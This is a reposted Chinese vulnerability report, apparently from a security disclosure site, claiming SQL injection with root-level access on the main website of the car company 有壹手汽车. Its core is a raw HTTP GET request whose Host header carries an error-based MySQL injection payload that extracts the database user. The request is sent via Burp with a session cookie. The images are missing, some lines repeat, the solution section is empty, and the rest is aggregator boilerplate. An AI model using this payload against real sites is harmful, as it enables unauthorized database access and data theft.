1. 计算机技术网首页
  2. web服务器教学教程
  3. 企业安全

有壹手汽车主站存在SQL注入漏洞(涉及ROOT权限)企业安全分享!

企业安全 阅读 1

有壹手汽车主站存在SQL注入漏洞(涉及ROOT权限)
RT 

使用burp,填上域名和端口:

有壹手汽车主站存在SQL注入漏洞(涉及ROOT权限)


RT

 

 GET / HTTP/1.1 Host: 'and(select 1 from(select count(*),concat((select concat(user()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' Cookie: fs_think_template=%22kmw%22; PHPSESSID=0qlf7d9np2ugdjf4363qamqmv6 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */*

使用burp,填上域名和端口:

有壹手汽车主站存在SQL注入漏洞(涉及ROOT权限)

 

有壹手汽车主站存在SQL注入漏洞(涉及ROOT权限)

 

有壹手汽车主站存在SQL注入漏洞(涉及ROOT权限)

 

有壹手汽车主站存在SQL注入漏洞(涉及ROOT权限)

 

 

解决方案:

 

www.dengb.comtruehttps://www.dengb.com/qyaq/1114771.htmlTechArticle有壹手汽车主站存在SQL注入漏洞(涉及ROOT权限) RT GET / HTTP/1.1Host: and(select 1 from(select count(*),concat((select concat(user()) from information_schema.tables l…

—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>

本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。

ctvol管理联系方式QQ:251552304

本文章地址:https://www.ctvol.com/webstt/esecurity/99301.html

(0)
0
上一篇 2020年4月26日
下一篇 2020年4月26日

精彩推荐